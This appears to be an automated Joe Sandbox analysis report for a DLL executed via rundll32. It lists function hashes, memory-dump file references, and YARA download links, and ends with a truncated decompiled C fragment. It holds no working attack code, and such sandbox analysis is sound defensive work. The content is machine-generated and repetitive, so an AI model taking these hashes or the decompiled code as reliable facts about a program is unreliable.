Opcode ID: ff52c7ffbd1d9107fcbef65328e3878b9d8ec7e0a566bd5413746ddd724ee47a
Instruction ID: 17bda300cafbee541834c927e7bcf7240875502bd3d5a4043446c7d08037228a
Opcode Fuzzy Hash: ff52c7ffbd1d9107fcbef65328e3878b9d8ec7e0a566bd5413746ddd724ee47a
Instruction Fuzzy Hash: 84E10775B083408FC304CE29D88060AFBF6EFC9364F598A2DF999D73A1D671E9458B42

Uniqueness

Uniqueness Score: -1.00%

Function 1000B830 Relevance: .3, Instructions: 299COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a2f94ac762cd677dc8362f514d4668eefae1739862ad9c7aa78fec698a4c789
Instruction ID: be10b61e0e400d7f3c7b246480c7663c1106f3f721ef33eb9267169c2a0f6ae4
Opcode Fuzzy Hash: 5a2f94ac762cd677dc8362f514d4668eefae1739862ad9c7aa78fec698a4c789
Instruction Fuzzy Hash: 1FC14D3160496CCFD75CEF29D8E48753393ABE831174B86ADD6034B3A5CA30B925DB94

Uniqueness

Uniqueness Score: -1.00%

Function 1004D583 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b2f5e3a6e755b5cd1ec8c14b0b22a304fa7b3516a21b49beeeb033897322eaa
Instruction ID: 89953b31e04fa7be04450d99485250ae3be7f122ea8c091805a4f71ec7c47705
Opcode Fuzzy Hash: 8b2f5e3a6e755b5cd1ec8c14b0b22a304fa7b3516a21b49beeeb033897322eaa
Instruction Fuzzy Hash: CEC15F302087959FC741DF2AC4805A6FBF1EF9A200F49C55EE8D8CB346D634EA15DB91

Uniqueness

Uniqueness Score: -1.00%

Function 10021340 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee0655b07f9a60d7e6c93e24dd163bbcdd8dd7aa916f57eec32edbbdc4cc49b7
Instruction ID: 1db670544306bd251aebef4a7dbe6716f8247bd2a01bbc6002f53e6d6edf3967
Opcode Fuzzy Hash: ee0655b07f9a60d7e6c93e24dd163bbcdd8dd7aa916f57eec32edbbdc4cc49b7
Instruction Fuzzy Hash: 7BA14C745083168BD750DF16E4442AFF7E0FF94B84F958A2EF898DB250E234D981DB92

Uniqueness

Uniqueness Score: -1.00%

Function 1004E3E0 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2dad646239292c082a3e3cd6a8f2edab19a4e84d94e2075355bf024ee8a0388
Instruction ID: 14d1569ad32843df1e0f4a955a3229223ca10cf1b234f8bfe071cdd5ef662ba1
Opcode Fuzzy Hash: e2dad646239292c082a3e3cd6a8f2edab19a4e84d94e2075355bf024ee8a0388
Instruction Fuzzy Hash: 3CB128396083568FC754CF29C4C088BB7E2FF88314B66892DE959CB325E770F9558B85

Uniqueness

Uniqueness Score: -1.00%

Function 1004D5C1 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d016340bc325db1fd1648bbb37fa4be5db1333341c3535a9616d09fdc8b0c0ba
Instruction ID: 5b61de884d90df82446b19460e85b2eea36a0198e06777fdadc74bd29ad9c96a
Opcode Fuzzy Hash: d016340bc325db1fd1648bbb37fa4be5db1333341c3535a9616d09fdc8b0c0ba
Instruction Fuzzy Hash: DDB15F302087959FC745DF2AC4805A6FBF1AF9A200F89C55EE8D8CB347D634EA15DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10008144 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fdca86bf5610cf8d83fc9a2a9123c7de6589e9a7e00ce3a8cca6f1a48dd3632
Instruction ID: 8c294614796abfce7a9b313687c0130c20c351539878b9b69ed8c38673feebb7
Opcode Fuzzy Hash: 0fdca86bf5610cf8d83fc9a2a9123c7de6589e9a7e00ce3a8cca6f1a48dd3632
Instruction Fuzzy Hash: 2DA134356002118FD398DE1FD8D0D6A7393ABC432DF5BC26E9E445B3AACD38B4669790

Uniqueness

Uniqueness Score: -1.00%

Function 1000E760 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7460696957a74314385251e6c6bcc12f45c6b26b427e07c74903d9ed9e685e2
Instruction ID: a9fd71970cc6ae0704401159e34ccb1fdaf457640d2c7af12330d1c819c8daf0
Opcode Fuzzy Hash: f7460696957a74314385251e6c6bcc12f45c6b26b427e07c74903d9ed9e685e2
Instruction Fuzzy Hash: 8941B173F2582507E7188828CC05319B2C3DBE4271B1EC37AED59EB789E934ED1686C2

Uniqueness

Uniqueness Score: -1.00%

Function 1000164B Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e5339e86325d42bd6281c81f51f6f83cb80fe511d73c762a27f573bff63cef8
Instruction ID: 40aabe202a40184f6c89db9be28c5e271f9100c876ec067dbcd78a5b86649b1c
Opcode Fuzzy Hash: 2e5339e86325d42bd6281c81f51f6f83cb80fe511d73c762a27f573bff63cef8
Instruction Fuzzy Hash: 5681CD745042528FDB94CF29C5C0A96BBE1FF99310F5988B9ED9C8F61AE230A941DF60

Uniqueness

Uniqueness Score: -1.00%

Function 1004D3B0 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b576644014d14f1c54322c87fd66bbfde8640324f1e42ad5ea2fc848f20d65e
Instruction ID: 3b5e75aad5a0c08e1416bd72158d909f1297ac2347114389bb20aec0d49765e5
Opcode Fuzzy Hash: 7b576644014d14f1c54322c87fd66bbfde8640324f1e42ad5ea2fc848f20d65e
Instruction Fuzzy Hash: 26516B71A043148FC314DF5AC480956B3E1FF8C218F8A896EDA855B363CB74B812CB94

Uniqueness

Uniqueness Score: -1.00%

Function 10021760 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21e1bf70edc85c72b57ecd771a589712a2623989afca4d70576e69868d5c536e
Instruction ID: 9aaf14044436f1b2b42603b9fb6b72ce4f3e40e728a04a0e74472568190d7af2
Opcode Fuzzy Hash: 21e1bf70edc85c72b57ecd771a589712a2623989afca4d70576e69868d5c536e
Instruction Fuzzy Hash: 5E419866B0833196E314ABEDF4C049DF2E1FED1BA1B824A69D2952F141D330D449C7E7

Uniqueness

Uniqueness Score: -1.00%

Function 1000D060 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01961a118ebc83994ce737a496e9055b1f8ab46d9bbd015c8cfe35346e32c7fc
Instruction ID: 6d93bd8323a72235920ba6e149a4a7bae96c73b66a2dfad555009d0c6ff0ce4f
Opcode Fuzzy Hash: 01961a118ebc83994ce737a496e9055b1f8ab46d9bbd015c8cfe35346e32c7fc
Instruction Fuzzy Hash: 5311D2B3F2453203E71CD4199C2136D828387E82B071FC23FDE47A7286EC609D5682D1

Uniqueness

Uniqueness Score: -1.00%

Function 1000C0B0 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de151643a332339ce823666c471d4da1aa7b144928b0c7d3fd1e004a2c822b77
Instruction ID: 192b5b8e635135c3962563ef613f7b52fce4010c0b042699b34e9086fceffb22
Opcode Fuzzy Hash: de151643a332339ce823666c471d4da1aa7b144928b0c7d3fd1e004a2c822b77
Instruction Fuzzy Hash: 38316F651087D85ECB11CF3544904EABFE09EAB581B09C49EF8E84B247C524EB09EB71

Uniqueness

Uniqueness Score: -1.00%

Function 100101D0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c78873d4f70a7114040ce7729ab5ab63925d14f9cd724e7e38f810f9ad5a330b
Instruction ID: 7615e6e647f5862a10f08712ea71b14590be4302af2179b17c0dfb1654340f57
Opcode Fuzzy Hash: c78873d4f70a7114040ce7729ab5ab63925d14f9cd724e7e38f810f9ad5a330b
Instruction Fuzzy Hash: FF2122726042658BCB14DE19C8D86AB73E2FBC9314F168A68E9C55F205C234F84ACBD1

Uniqueness

Uniqueness Score: -1.00%

Function 1001021B Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 123d4edf2cae72c4cb44158153aca10c35860e83f93e9ec1453424ef70596d6d
Instruction ID: bcaa8491dccb865917a35a3d808823525e0e43ff59a73624eea8fea794acadd0
Opcode Fuzzy Hash: 123d4edf2cae72c4cb44158153aca10c35860e83f93e9ec1453424ef70596d6d
Instruction Fuzzy Hash: 141134326041618BCB15CE69C8D86AA73D2FBC9315F17C968E9C69F245C334F94ACBD0

Uniqueness

Uniqueness Score: -1.00%

Function 1000C1B0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca7d7dad83a973bb790b37e6832e95b579524e0ac113e1f4aa988c8562b958bd
Instruction ID: f8771a243a862af8759e5689c7b57640d36b1020b076dab7645bd5d8fe9118fc
Opcode Fuzzy Hash: ca7d7dad83a973bb790b37e6832e95b579524e0ac113e1f4aa988c8562b958bd
Instruction Fuzzy Hash: BDF0F676B1435947E900DF459C40B8BB7D9FFC42D8F16052EED48A3305C630BD0586A1

Uniqueness

Uniqueness Score: -1.00%

Function 1008B030 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 566e91d0b8d452359c7bb78fe999ee31250548b62ca49a35f0ac2a50155920e7
Instruction ID: fb49bc79d4318df5132ff4e8978937c42cbf5c601f0cfd761cb428f5592a7514
Opcode Fuzzy Hash: 566e91d0b8d452359c7bb78fe999ee31250548b62ca49a35f0ac2a50155920e7
Instruction Fuzzy Hash: 19E0C9B62193159FE314DE09E8808A7FBECEBD8664B10492FF4C493300C231AC448BB1

Uniqueness

Uniqueness Score: -1.00%

Function 10017162 Relevance: 100.1, APIs: 56, Strings: 1, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

mv_mallocz.MAIN ref: 10017236

Strings

Invalid chars '%s' at the end of expression '%s', xrefs: 1001726C

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_mallocz
String ID: Invalid chars '%s' at the end of expression '%s'
API String ID: 1901900789-1422635149
Opcode ID: b9b5404f8f7a3a855f615fbe720d284632f6c1f76810d66ba6a38d70fdf3f15c
Instruction ID: bac24a0257c5d849bb0dbfe2b802779c263aec53df092acb8c93c3cd01452c15
Opcode Fuzzy Hash: b9b5404f8f7a3a855f615fbe720d284632f6c1f76810d66ba6a38d70fdf3f15c
Instruction Fuzzy Hash: CBE184B89097819FC780DF68C48191ABBF1FF88250F85586DF8C58B316E735E881CB92

Uniqueness

Uniqueness Score: -1.00%

Function 10017261 Relevance: 98.3, APIs: 55, Strings: 1, Instructions: 270
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E10017261(void* __eax, void* __ebx, void* __edi, intOrPtr __esi, char _a4, char* _a8, char* _a12, intOrPtr _a16, char _a48, char* _a52, char _a56, char _a60) {
				intOrPtr _t116;
				void* _t118;
				intOrPtr* _t120;

				_t116 = __esi;
				_a12 = __eax;
				__eax = "Invalid chars \'%s\' at the end of expression \'%s\'\n";
				__edx = 0x10;
				_a8 = "Invalid chars \'%s\' at the end of expression \'%s\'\n";
				__eax =  &_a60;
				_a16 = __ebx;
				_a4 = 0x10;
				 *__esp =  &_a60;
				__eax = L10023A40();
				_a48 = __edi;
				if(__edi != 0) {
					__eax =  *(__edi + 0x18);
					_a52 = __eax;
					if(__eax != 0) {
						__edx = __eax[0x18];
						_a56 = __edx;
						if(__edx != 0) {
							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
							_a56 =  *(_a56 + 0x1c);
							__eax = E10015280( *(_a56 + 0x1c));
							_a56 =  *(_a56 + 0x20);
							E10015280( *(_a56 + 0x20)) = _a56;
							__eax = _a56 + 0x24;
							E100265C0(_a56 + 0x24);
							__eax =  &_a56;
							E100265C0( &_a56);
							__eax = _a52;
						}
						__edx = __eax[0x1c];
						_a56 = __edx;
						if(__edx != 0) {
